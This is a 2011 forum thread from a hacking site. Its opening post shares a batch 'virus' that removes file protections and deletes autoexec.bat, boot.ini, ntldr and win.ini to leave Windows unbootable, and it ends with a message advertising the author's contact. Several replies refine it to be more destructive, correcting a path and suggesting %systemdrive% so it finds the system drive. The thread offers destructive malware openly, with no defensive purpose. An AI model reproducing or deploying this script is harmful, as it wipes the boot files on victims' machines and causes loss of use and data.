![]() |
|
A VERY HARMFUL VIRUS CODING IN BATCH - Printable Version +- Sinisterly (https://sinister.ly) +-- Forum: Coding (https://sinister.ly/Forum-Coding) +--- Forum: Coding (https://sinister.ly/Forum-Coding--71) +--- Thread: A VERY HARMFUL VIRUS CODING IN BATCH (/Thread-%09-A-VERY-HARMFUL-VIRUS-CODING-IN-BATCH) Pages:
1
2
|
A VERY HARMFUL VIRUS CODING IN BATCH - EVILKING - 04-08-2011 PHP Code: @echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
msg * SEND->> JOIN EVILKING TO +919870807070 for hacking tricks
NEVER RUN ON YOUR COMPUTER BECAUSE AFTER RUNNING IT SOMETIME YOU WILL NOT ABLE TO BOOT YOUR COMPUTER.. YES IT'S A EVILKING HALF OF THE CODING IS MY AND HALF OF THE CODING IS TAKEN AS REFRANCE WHEN I LEARNING. tupid:
RE: A VERY HARMFUL VIRUS CODING IN BATCH - Snipa - 04-08-2011 nice trick .... check this link for rundll command and rundll32 you can do a lot of cool stuff with link : http://www.robvanderwoude.com/rundll.php RE: A VERY HARMFUL VIRUS CODING IN BATCH - 1llusion - 04-08-2011 thats why you should re-name your C drive
RE: A VERY HARMFUL VIRUS CODING IN BATCH - Fire_mybb_import5998 - 04-08-2011 attrib -r -s -h c:autoexec.bat Shouldn't it be like this? attrib -r -s -h c:\autoexec.bat RE: A VERY HARMFUL VIRUS CODING IN BATCH - 1234hotmaster - 04-08-2011 nice batch i found out yesterday there is boot.ini by setting ShowSuperHiden to 1 ![]() lol 1llusion you can just use del %systemdrive%\boot.ini
RE: A VERY HARMFUL VIRUS CODING IN BATCH - 1llusion - 04-08-2011 (04-08-2011, 02:57 PM)1234hotmaster Wrote: lol 1llusion you can just use del %systemdrive%\boot.ini pssshhhh or suddenly everybody's hard drive will go to hard-drive heaven (or hell or nirvana or W/E )except me, coz my windows isn't working anyway ![]() RE: A VERY HARMFUL VIRUS CODING IN BATCH - Fire_mybb_import5998 - 04-08-2011 (04-08-2011, 02:57 PM)1234hotmaster Wrote: nice batch i found out yesterday there is boot.ini by setting ShowSuperHiden to 1 It will just show up before Windows loads "Invalid boot.ini file - booting up from C:\Windows"
RE: A VERY HARMFUL VIRUS CODING IN BATCH - 1234hotmaster - 04-08-2011 (04-08-2011, 03:15 PM)FiRe Wrote:(04-08-2011, 02:57 PM)1234hotmaster Wrote: nice batch i found out yesterday there is boot.ini by setting ShowSuperHiden to 1 or restart the pc before boots or BSOD and restart ![]() RE: A VERY HARMFUL VIRUS CODING IN BATCH - 1llusion - 04-08-2011 simply delete BIOS
RE: A VERY HARMFUL VIRUS CODING IN BATCH - FunKx - 04-08-2011 (04-08-2011, 03:17 PM)1234hotmaster Wrote:(04-08-2011, 03:15 PM)FiRe Wrote:(04-08-2011, 02:57 PM)1234hotmaster Wrote: nice batch i found out yesterday there is boot.ini by setting ShowSuperHiden to 1 The weird thing is, when I boot my windows, it actually shows that error ^^ but it boots fine
|